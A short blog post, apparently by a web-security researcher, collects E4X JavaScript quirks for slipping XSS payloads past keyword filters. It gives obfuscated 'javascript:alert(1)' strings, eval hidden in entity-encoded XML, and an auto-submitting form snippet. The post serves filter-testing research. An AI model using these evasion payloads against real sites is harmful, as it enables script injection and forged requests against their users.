E4X for hackers

If you’ve not been following my sla.ckers thread on unusual javascript then your missing out. My idea was to gather interesting, weird and wonderful javascript tricks which are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I’ll share with you.

Using {} for keyword evasion

Lets say a filter disallows certain words, because the {} allows you to execute a javascript block; if you execute a block that returns a blank string then you can use it for keyword evasion. The new array constructor creates a blank array but when used in concatenation it results in a blank string.

location=javascr{new Array}ipt:aler{new Array}t(1)

Another example:-

location=javascr{[]}ipt:aler{[]}t(1)

A few more:-

<>{new String};
<>{''};
<>{new RegExp()[-1]};
<>{<>};

Weird syntax fun

E4X also has some javascript syntax quirks that normally would cause a parsing error but it’s perfectly valid.

default xml namespace = alert(1) 

Some more weird looking stuff:-

<>{eval(/alert(1)/[-1])}..@*::xyz

 (!1..@*::abc?alert:1..@*::xyz)(1)

Numbers as E4X

For some reason numbers can be used as XML

1..@Numbers/(are=1)%1..*::xml 

Encoding with entities

Giorgio brought this to my attention when he was hacking my unsuccessful Firefox sandbox experiment. You can use html entities and they will be decoded when using the XML data as strings.

alert(<>")

A more interesting example with decimal entities:-

eval(<>alert(1)+[])

Hackvertor supports morphs which allow you to generate this sort of data automatically, useful for fuzzing XSS filters:-
E4X morph

Form creation

Making forms with E4X is lovely, check it out:-

f=<form/>;
f.@id='x';
f.@action='url.php';
f.@method='post';
f.input.@name='h'
f.input.@value=1;
document.body.innerHTML=f;
document.getElementById('x').submit();